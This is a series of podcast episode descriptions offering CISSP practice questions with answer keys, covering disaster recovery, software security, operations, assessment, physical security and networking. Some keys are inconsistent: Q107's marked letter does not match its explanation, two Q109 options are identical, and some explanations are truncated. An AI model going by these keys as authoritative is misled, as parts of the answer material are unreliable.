Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.    In this episode, Shon will talk about the following items that are included within Domain 1 (Security and Risk Management) of the CISSP Exam.  BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/  CISSP Exam Questions  Question:  129   Which of the following could lead to the conclusion that a disaster recovery plan may not be operational within the timeframe the business needs to recover?  A. )The alternate site is a warm site  B. Critical recovery priority levels are not defined  C. Offsite backups are located away from the alternate site  D. The alternate site is located 70 miles away from the primary site  Answer: B  Explanation:  From    ------------------------------------  Question:  130  What are the four domains of communication in the disaster planning and recovery process?  A. Plan manual, plan communication, primer for survival, warning and alarms  B. Plan communication, primer for survival, escalation, declaration  C. Plan manual, warning and alarm, declaration, primer for survival  D. Primer for survival, escalation, plan communication, warning and alarm  Answer: C  Explanation: From   ------------------------------------  Question:  131  The underlying reason for creating a disaster planning and recover strategy is to  A. Mitigate risks associated with disaster.  B. Enable a business to continue functioning without impact.  C. Protect the organization’s people, place and processes.  D. Minimize financial profile. Answer: A  Explanation: “Disaster recovery has the goal of minimizing the effects of a disaster and taking the necessary steps to ensure that the resources, personnel, and business processes are able to resume operation in a timely manner.” Pg 550 Shon Harris: All-in-One CISSP Certification From   ------------------------------------  Want to find Shon elsewhere on the internet?  LinkedIn – www.linkedin.com/in/shongerber  Facebook - https://www.facebook.com/CyberRiskReduced/  LINKS:   ISC2 Training Study Guide  https://www.isc2.org/Training/Self-Study-Resources  Online Article  https://www.cio.com/article/2381021/best-practices-how-to-create-an-effective-business-continuity-plan.html 

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will provide CISSP training for Domain 8 (Software Development Security) of the CISSP Exam.  His extensive training will cover all of the CISSP domains. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ CISSP Exam Questions Question:  128 In what type of software testing does the tester have access to the underlying source code? A) Static testing B) Dynamic testing C) Cross-site scripting testing D) Black box testing Static testing In order to conduct a static test, the tester must have access to the underlying source code. From https://www.brainscape.com/flashcards/software-development-security-976024/packs/1774328 ------------------------------------ Question:  129 What portion of the change management process allows developers to prioritize tasks? A) Release control B) Configuration control C) Request control D) Change audit Request control The request control provides users with a framework to request changes and developers with the opportunity to prioritize those requests. From https://www.brainscape.com/flashcards/software-development-security-976024/packs/1774328 ------------------------------------ Question:  130 Which one of the following key types is used to enforce referential integrity between database tables? A) Candidate key B) Primary key C) Foreign key D) Super key Foreign key Foreign keys are used to enforce referential integrity constraints between tables that participate in a relationship. From https://www.brainscape.com/flashcards/software-development-security-976024/packs/1774328 ------------------------------------ Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will provide CISSP training for Domain 8 (Software Development Security) of the CISSP Exam.  His extensive training will cover all of the CISSP domains. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ CISSP Exam Questions Question:  125 What type of virus utilizes more than one propagation technique to maximize the number of penetrated systems? A) Stealth virus B) Companion virus C) Polymorphic virus D) Multipartite virus Multipartite virus Multipartite viruses use two or more propagation techniques (for example, file infection and boot sector infection) to maximize their reach. From https://www.brainscape.com/flashcards/software-development-security-976024/packs/1774328 ------------------------------------ Question:  126 What programming language(s) can be used to develop ActiveX controls for use on an Internet site? A) Visual Basic B) C C) Java D) All of these are correct. All of these are correct Microsoft's ActiveX technology supports a number of programming languages, including Visual Basic, C, C++, and Java. On the other hand, only the Java language can be used to write Java applets. From https://www.brainscape.com/flashcards/software-development-security-976024/packs/1774328 ------------------------------------ Question:  127 What transaction management principle ensures that two transactions do not interfere with each other as they operate on the same data? A) Atomicity B) Consistency C) Isolation D) Durability Isolation The isolation principle states that two transactions operating on the same data must be temporarily separated from each other such that one does not interfere with the other. From https://www.brainscape.com/flashcards/software-development-security-976024/packs/1774328 ------------------------------------ Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will provide CISSP training for Domain 8 (Software Development Security) of the CISSP Exam.  His extensive training will cover all of the CISSP domains. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/  CISSP Exam Questions Question:  122 What type of reconnaissance attack provides attackers with useful information about the services running on a system? A) Session hijacking B) Port scan C) Dumpster diving D) IP sweep Port scan Port scans reveal the ports associated with services running on a machine and available to the public. From https://www.brainscape.com/flashcards/software-development-security-976024/packs/1774328 ------------------------------------ Question:  123 What technology does the Java language use to minimize the threat posed by applets? A) Confidentiality B) Encryption C) Stealth D) Sandbox   Sandbox The Java sandbox isolates applets and allows them to run within a protected environment, limiting the effect they may have on the rest of the system. From https://www.brainscape.com/flashcards/software-development-security-976024/packs/1774328 ------------------------------------ Question:  124 What is the most effective defense against cross-site scripting attacks? A) Limiting account privileges B) Input validation C) User authentication D) Encryption Input validation Input validation prevents cross-site scripting attacks by limiting user input to a predefined range. This prevents the attacker from including the HTML From https://www.brainscape.com/flashcards/software-development-security-976024/packs/1774328 ------------------------------------   Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will provide CISSP training for Domain 7 (Security Operations) of the CISSP Exam.  His extensive training will cover all of the CISSP domains. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ CISSP Exam Questions Question:  119 What is considered a Computer Security Incident? Earthquake hits your data center rendering it unusable A patch was implemented resulting in a loss of a critical system Local construction workers cut the fiber line that provides a network feed for your building An employee violated the company's acceptable use policy by downloading pirated software Explanation: [d] A violation of a company's acceptable use policy is considered a Computer Security Incident.   The other options fit within the broad concept of an incident. ------------------------------------ Question:  120 What is the primary goal of a Change Management Process within an organization? Provide good structure for making changes within a network Avoid outages within your network Provide documentation on all changes within a network All the above Explanation: [b] The primary goal of a Change Management Process is to avoid outages within your network environment.  All of the above are important, but the primary goal is to avoid outages.  ------------------------------------ Question:  121 Which of the following is are considered a strategic strategy for backups within a business environment? Full Backup Incremental Backup Differential Backup All the above Explanation: [d] All of the above are considered a strategic solution for you backups within a business environment.  ------------------------------------ Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will provide CISSP training for Domain 7 (Security Operations) of the CISSP Exam.  His extensive training will cover all of the CISSP domains. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ CISSP Exam Questions Question:  116 What is the highest potential risk for keeping log files from computer and network devices within your environment? Subject to legal discovery Consume large amounts of storage Continuously increasing storage costs None of the above Explanation: [a] All of the above are reasons not to keep log files too long on your environment, but the highest risk to your organization is the opportunity for legal discovery. ----------------------------------- Question:  117 Organizations focused on the concept of "least privilege" focus on which of the following? Only a few have the most network access within a company Only decision makers have the necessary access needed within the company Each person only needs access based on role/requirements Most senior individuals within the company have the majority of the access Explanation: [c] Each person should only have the access needed for their role/position.  Typically, employees’ access will increase over time as access is granted, but rarely removed. ------------------------------------ Question:  118 Compact Disks (CD) and Data Video Disks (DVD) do not degrade over time and are considered safe for long term storage of data? True False Explanation: [b] CDs / DVDs will degrade over time and should not be considered good storage media for data for long periods of time.   ------------------------------------ Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will provide CISSP training for Domain 7 (Security Operations) of the CISSP Exam.  His extensive training will cover all of the CISSP domains. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/  CISSP Exam Questions Question:  113 When conducting an incident investigation within an organization what are some keep items to keep in mind before starting? Assemble a team with best skillsets to meet objectives Operate under your Incident Response Process Define specific Rules of Engagement (ROEs) around Law Enforcement, Interviewing Employees, etc. All of the above Explanation: [d] All of the above should be considered when conducting an investigation of an incident within your organization.  ------------------------------------ Question:  114 What are the three options used for gathering evidence for an investigation? Voluntary Surrender, Subpoena, Search Warrant Involuntary Surrender, Subpoena, Search Warrant Voluntary Surrender, Search and Seizure, Warrant Involuntary Surrender, Search and Seizure, Warrant Explanation: [a] When gathering evidence there are three legal options available to gain access to evidence:  Voluntary Surrender, Subpoena, and a Search Warrant.   ------------------------------------ Question:  115 What of the following steps will not be included within the change management process? Immediate change, if leadership wants the change to occur A change request Rollback plan for the change Documenting the change Explanation: [a] There are situations where emergency changes need to occur, but it should be an emergency and not the desire of an individual to just make the change.  ------------------------------------ Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide o    https://www.isc2.org/Training/Self-Study-Resources Online Article o    https://www.dflabs.com/blog/9-key-components-of-incident-and-forensics-management/

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will provide CISSP training for Domain 6 (Security Assessment and Testing) of the CISSP Exam.  His extensive training will cover all of the CISSP domains. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ CISSP Exam Questions Question:  110 Tom would like to test system that lie within his network for vulnerabilities that could be exploited by the most recent set of ransomware variants.  Which one of the following tools would be best suited to accomplish this task? Network discovery scanner Network vulnerability scanner Web vulnerability scanner Ping sweep Explanation [b] A network vulnerability scanner would be the best tool for discovering what vulnerabilities reside within your network. ----------------------------------- Question:  111 When trying to gain the most detailed information about a system from a scan, what is the best scan to meet that objective? Port Scan Authenticated Scan Vulnerability Scan Unauthenticated Scan Explanation: [b] An authenticated scan allows you to use credentials which will provide you the most detailed information.   An unauthenticated scan will only provide you a view that is available from the outside and may not be an adequate or fair assessment of the system.  ------------------------------------ Question:  112 What is the most common port used to communicated encrypted traffic on a web server? 22 143 80 443 Explanation: [d] 443 is the common standard where encrypted communications use for transmitting data.  However, any port can be used for encrypted data, but 443 is considered the common standard.  ------------------------------------ Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/   LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will provide CISSP training for Domain 6 (Security Assessment and Testing) of the CISSP Exam.  His extensive training will cover all of the CISSP domains. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ CISSP Exam Questions Question:  108 What are the various phases associated with completing a Penetration Test for an organization. Planning, Reporting, Vulnerability Management, Exploiting, Information Gathering Production, Registration, Vulnerability Management, Exploiting, Information Gathering Planning, Reporting, Vulnerability Scanning, Exploiting, Information Gathering Production, Reporting, Vulnerability Management, Exploiting, Information Gathering Explanation: [c] Planning, Reporting, Vulnerability Scanning, Exploiting, and Information Gathering (not in order) are the phases of completing a penetration test for an organization. ------------------------------------ Question:  109 When creating metrics for your leadership, what are first items you should focus first on and what should be your level of complexity for the report? Very complex metrics focused on all systems; Open vulnerabilities, Time to resolve, Outdated systems, Uploaded data, Legal/Compliance Issues Very simple metrics focused on critical systems; Open vulnerabilities, Time to resolve, Outdated systems, Uploaded data, Legal/Compliance Issues Very simple metrics focused on critical systems; Management processes, Closed vulnerabilities, Time to resolve, Outdated systems, Uploaded data, Legal/Compliance issues Very simple metrics focused on critical systems; Open vulnerabilities, Time to resolve, Outdated systems, Uploaded data, Legal/Compliance Issues Explanation:  [b] Starting off with simple metrics focused on critical systems with the following metrics:  Open vulnerabilities, Time to resolve, Outdated systems, Uploaded data, Legal/Compliance Issues is the best method to get started.  Obviously, you organization may be different and you will have to modify to meet your needs, but it is good place to get started….keep it simple.   ------------------------------------ Question:  110 When completing a Penetration Test of your organization who needs to be involved in the discussion and decision? No one; informing people that the penetration test will occur will taint the results resulting in waste Everyone; it is important that people don't feel duped that this test was designed to trick them Key personnel; it is important to focus on only telling the decision makers/influencers (CEO/CIO, Legal, Public Affairs, Compliance) as it relates to a penetration test. None of the above Explanation: [c] It is important the right people are involved in the decision making process as a Pen Test can have significant impact on an organization and cause a disruption within a company. ------------------------------------ Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will provide CISSP training for Domain 6 (Security Assessment and Testing) of the CISSP Exam.  His extensive training will cover all of the CISSP domains. CISSP Article – RAYGUN - SDLC:  7 phases, popular models, benefits, and more CISSP Training –  Integrate Security in the Software Development Life Cycle (SDLC) CISSP Exam Questions BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/  CISSP Exam Questions Question:  105 What tool is commonly used as scan engine to find vulnerabilities within an environment Nessus NMAP Ping DNS Explanation: [a] Nessus is commonly used to look for vulnerabilities within an network to determine if an exploit can be used against the system. ------------------------------------ Question:  106 What are the typical components that security assessments are typically used within an organization? Tests, Assessments, and Audits Tests, Audits, and Reviews Assessments, Access Reviews, Tests None of the above Explanation: [a] Tests, Assessments, and Audits are the main components of a security assessment for an organization.  ------------------------------------ Question:  107 Which one items below is not normally added as part of a security assessment? Risk assessments Vulnerability mitigation strategies Threat assessments Vulnerability scan Explanation: [c] Vulnerability mitigation strategies are not typically added as a part of the overall security assessment as the mitigation and/or acceptance of risk is highly dependent on the organization. ------------------------------------ Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will provide CISSP training for Domain 5 (Identity and Access Management) of the CISSP Exam.  His extensive training will cover all of the CISSP domains. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ CISSP Exam Questions Question:  102 If you want to restrict access into or out of a facility, which would you choose? A) Gate B) Turnstile C) Fence D) Mantrap Turnstile A turnstile is a form of gate that prevents more than one person from gaining entry at a time and often restricts movement to one direction. It is used to gain entry but not exit, or vice versa. From   ------------------------------------ Question:  103 Which of the following is not a disadvantage of using security guards? A) Security guards are usually unaware of the scope of the operations within a facility. B) Not all environments and facilities support security guards. C) Not all security guards are themselves reliable. D) Prescreening, bonding, and training does not guarantee effective and reliable security guards. Security guards are usually unaware of the scope of the operations within a facility. Security guards are usually unaware of the scope of the operations within a facility, which supports confidentiality of those operations and thus helps reduce the possibility that a security guard will be involved in the disclosure of confidential information. From ------------------------------------ Question:  104 What type of motion detector senses changes in the electrical or magnetic field surrounding a monitored object?   A) Wave B) Photoelectric C) Heat D) Capacitance Capacitance A capacitance motion detector senses changes in the electrical or magnetic field surrounding a monitored object. From ------------------------------------ Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will provide CISSP training for Domain 5 (Identity and Access Management) of the CISSP Exam.  His extensive training will cover all of the CISSP domains. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ CISSP Exam Questions Question:  099 What is the ideal humidity range for a computer room? A) 20-40 percent B) 40-60 percent C) 60-75 percent D) 80-95 percent 40-60 percent The humidity in a computer room should ideally be from 40 to 60 percent. From   ------------------------------------ Question:  100 A Type B fire extinguisher may use all except which of the following suppression mediums? A) Water B) CO2 C) Halon or an acceptable halon substitute D) Soda acid Water Water is never the suppression medium in Type B fire extinguishers because they are used on liquid fires. From ------------------------------------ Question:  101 Which of the following is not a disadvantage of using security guards? A) Security guards are usually unaware of the scope of the operations within a facility. B) Not all environments and facilities support security guards. C) Not all security guards are themselves reliable. D) Prescreening, bonding, and training does not guarantee effective and reliable security guards. Security guards are usually unaware of the scope of the operations within a facility. From ------------------------------------ Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/   LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will provide CISSP training for Domain 5 (Identity and Access Management) of the CISSP Exam.  His extensive training will cover all of the CISSP domains. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/  CISSP Exam Questions Question:  096 At what voltage level can static electricity cause destruction of data stored on hard drives? A) 4,000 B) 17,000 C) 40 D) 1,500 1,500 Destruction of data stored on hard drives can be caused by 1,500 volts of static electricity. From https://www.brainscape.com/flashcards/physical-environmental-security-1004067/packs/1774328 ------------------------------------ Question:  097 What type of physical security controls focus on facility construction and selection, site management, personnel controls, awareness training, and emergency response and procedures? A) Technical B) Physical C) Administrative D) Logical Administrative Administrative physical security controls include facility construction and selection, site management, personnel controls, awareness training, and emergency response and procedures. From https://www.brainscape.com/flashcards/physical-environmental-security-1004067/packs/1774328 ------------------------------------ Question:  098 Which of the following is typically not a culprit in causing damage to computer equipment in the event of a fire and a triggered suppression? A) Heat B) Suppression medium C) Smoke D) Light Light Light is usually not damaging to most computer equipment, but fire, smoke, and the suppression medium (typically water) are very destructive. From https://www.brainscape.com/flashcards/physical-environmental-security-1004067/packs/1774328 ------------------------------------ Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources Online Article https://www.hidglobal.com/blog/multi-factor-authentication-and-single-sign-explained

Subscribe: iTunes | Goggle Play | Stitcher Radio | RSS Description: Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will provide CISSP training for Domain 4 (Communication and Network Security) of the CISSP Exam.  His extensive training will cover all of the CISSP domains. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ CISSP Exam Questions Question:  093 ________ is a standards-based mechanism for providing encryption for point-to-point TCP/IP traffic. A) UDP B) IDEA C) IPSec D) SDLC IPSec IPSec, or IP Security, is a standards-based mechanism for providing encryption for point-to-point TCP/IP traffic. From https://www.brainscape.com/flashcards/telecommunications-and-network-security-971259/packs/1774328 ------------------------------------ Question:  094 What is both a benefit and a potentially harmful implication of multilayer protocols? A) Throughput B) Encapsulation C) Hash integrity checking D) Logical addressing Encapsulation Encapsulation is both a benefit and a potentially harmful implication of multilayer protocols.   From https://www.brainscape.com/flashcards/telecommunications-and-network-security-971259/packs/1774328   ------------------------------------ Question:  095 Which of the following is not true regarding firewalls? A) They are able to log traffic information. B) They are able to block viruses. C) They are able to issue alarms based on suspected attacks. D) They are unable to prevent internal attacks. They are able to block viruses. Most firewalls offer extensive logging, auditing, and monitoring capabilities as well as alarms and even basic IDS functions. Firewalls are unable to block viruses or malicious code transmitted through otherwise authorized communication channels, prevent unauthorized but accidental or intended disclosure of information by users, prevent attacks by malicious users already behind the firewall, or protect data after it passed out of or into the private network. From https://www.brainscape.com/flashcards/telecommunications-and-network-security-971259/packs/1774328 ------------------------------------ Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources

Subscribe: iTunes | Goggle Play | Stitcher Radio | RSS Description: Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will provide CISSP training for Domain 4 (Communication and Network Security) of the CISSP Exam.  His extensive training will cover all of the CISSP domains. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ CISSP Exam Questions Question:  090 Which type of firewall automatically adjusts its filtering rules based on the content of the traffic of existing sessions? A) Static packet filtering B) Application-level gateway C) Stateful inspection D) Dynamic packet filtering Dynamic packet filtering Dynamic packet-filtering firewalls enable the real-time modification of the filtering rules based on traffic content. From https://www.brainscape.com/flashcards/telecommunications-and-network-security-971259/packs/1774328 ------------------------------------ Question:  091 By examining the source and destination addresses, the application usage, the source of origin, and the relationship between current packets with the previous packets of the same session, firewalls are able to grant a broader range of access for authorized users and activities and actively watch for and block unauthorized users and activities. A) Static packet-filtering B) Application-level gateway C) Stateful inspection D) Circuit-level gateway Stateful inspection Stateful inspection firewalls are able to grant a broader range of access for authorized users and activities and actively watch for and block unauthorized users and activities. From https://www.brainscape.com/flashcards/telecommunications-and-network-security-971259/packs/1774328 ------------------------------------ Question:  092 Which of the following can be used to bypass even the best physical and logical security mechanisms to gain access to a system?   A) Brute-force attacks B) Denial of service C) Social engineering D) Port scanning Social engineering Social engineering can often be used to bypass even the most effective physical and logical controls. Whatever activity the attacker convinces the victim to perform, it is usually directed toward opening a back door that the attacker can use to gain access to the network. From https://www.brainscape.com/flashcards/telecommunications-and-network-security-971259/packs/1774328

0

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will provide CISSP training for  Domain 3 (Engineering Secure Design) of the CISSP Exam.  His extensive training will cover all of the CISSP domains. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ CISSP Exam Questions Question:  084 What is the most commonly used technique to protect against virus attacks? A) Signature detection B) Heuristic detection C) Data integrity assurance D) Automated reconstruction Signature detection Signature detection mechanisms use known descriptions of viruses to identify malicious code resident on a system. Source:  https://www.brainscape.com/flashcards/security-architecture-and-design-983876/packs/1774328> ------------------------------------ Question:  085 In which of the following security modes can you be assured that all users have access permissions for all information processed by the system but will not necessarily need to know of all that information? A) Dedicated B) System high C) Compartmented D) Multilevel System high In system high mode, all users have appropriate clearances and access permissions for all information processed by the system but need to know only some of the information processed by that system. Source:  https://www.brainscape.com/flashcards/security-architecture-and-design-983876/packs/1774328> ------------------------------------ Question:  086 What is a trusted computing base (TCB)? A) Hosts on your network that support secure transmissions B) The operating system kernel and device drivers C) The combination of hardware, software, and controls that work together to enforce a security policy D) The software and controls that certify a security policy The combination of hardware, software, and controls that work together to enforce a security policy The TCB is the combination of hardware, software, and controls that work together to enforce a security policy. Source:  https://www.brainscape.com/flashcards/security-architecture-and-design-983876/packs/1774328> ------------------------------------   Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/   LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will provide CISSP training for  Domain 3 (Engineering Secure Design) of the CISSP Exam.  His extensive training will cover all of the CISSP domains. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ CISSP Exam Questions Question:  081 Which one of the following storage devices is most likely to require encryption technology in order to maintain data security in a networked environment? A) Hard disk B) Backup tape C) Removable drives D) RAM Removable drives Removable drives are easily taken out of their authorized physical location, and it is often not possible to apply operating system access controls to them. Therefore, encryption is often the only security measure short of physical security that can be afforded to them. Backup tapes are most often well controlled through physical security measures. Hard disks and RAM chips are often secured through operating system access controls. Source:  https://www.brainscape.com/flashcards/security-architecture-and-design-983876/packs/1774328> ------------------------------------ Question:  082 What advanced virus technique modifies the malicious code of a virus on each system it infects? A) Polymorphism B) Stealth C) Encryption D) Multipartitism Polymorphism In an attempt to avoid detection by signature-based antivirus software packages, polymorphic viruses modify their own code each time they infect a system. Source:  https://www.brainscape.com/flashcards/security-architecture-and-design-983876/packs/1774328> ------------------------------------ Question:  083 Which one of the following types of memory might retain information after being removed from a computer and, therefore, represent a security risk? A) Static RAM B) Dynamic RAM C) Secondary memory D) Real memory Secondary memory Secondary memory is a term used to describe magnetic and optical media. These devices will retain their contents after being removed from the computer and may later be read by another user. Source:  https://www.brainscape.com/flashcards/security-architecture-and-design-983876/packs/1774328> ------------------------------------ Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will provide CISSP training for  Domain 3 (Engineering Secure Design) of the CISSP Exam.  His extensive training will cover all of the CISSP domains. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/  CISSP Exam Questions Question:  078 Which database security risk occurs when data from a higher classification level is mixed with data from a lower classification level? A) Aggregation B) Inference C) Contamination D) Polyinstantiation Contamination Contamination is the mixing of data from a higher classification level and/or need-to-know requirement with data from a lower classification level and/or need-to-know requirement. Source:  https://www.brainscape.com/flashcards/security-architecture-and-design-983876/packs/1774328> ------------------------------------ Question:  079 How many major categories do the TCSEC criteria define? A) Two B) Three C) Four D) Five Four TCSEC defines four major categories: category A is verified protection, category B is mandatory protection, category C is discretionary protection, and category D is minimal protection. Source:  https://www.brainscape.com/flashcards/security-architecture-and-design-983876/packs/1774328> ------------------------------------ Question:  080 Which Bell-LaPadula property keeps lower-level subjects from accessing objects with a higher security level? A) (star) Security Property B) No write up property C) No read up property D) No read down property No read up property The no read up the property, also called the Simple Security Policy, prohibits subjects from reading a higher security level object. Source:  https://www.brainscape.com/flashcards/security-architecture-and-design-983876/packs/1774328> ------------------------------------ Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS:  ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources Online Article https://thorteaches.com/what-is-the-best-way-to-study-for-the-cissp-certification/

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  In this episode, Shon will talk about questions for Domain 2 (Asset Security) of the CISSP Exam. BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/ CISSP Exam Questions Question:  075 As head of sales, Jim is the data owner for the sales department. Which of the following is not Jim’s responsibility as data owner? Assigning information classifications Dictating how data should be protected Verifying the availability of data Determining how long to retain data Answer: C. The responsibility of verifying the availability of data is the only responsibility listed that does not belong to the data (information) owner. Rather, it is the responsibility of the data (information) custodian. The data custodian is also responsible for maintaining and protecting data as dictated by the data owner. This includes performing regular backups of data, restoring data from backup media, retaining records of activity, and fulfilling information security and data protection requirements in the company’s policies, guidelines, and standards. Data owners work at a higher level than the data custodians. The data owners basically state, “This is the level of integrity, availability, and confidentiality that needs to be provided—now go do it.” The data custodian must then carry out these mandates and follow up with the installed controls to make sure they are working properly. From ------------------------------------ Question:  076 Assigning data classification levels can help with all of the following except: The grouping of classified information with hierarchical and restrictive security Ensuring that nonsensitive data is not being protected by unnecessary controls Extracting data from a database Lowering the costs of protecting data Answer: C. Data classification does not involve the extraction of data 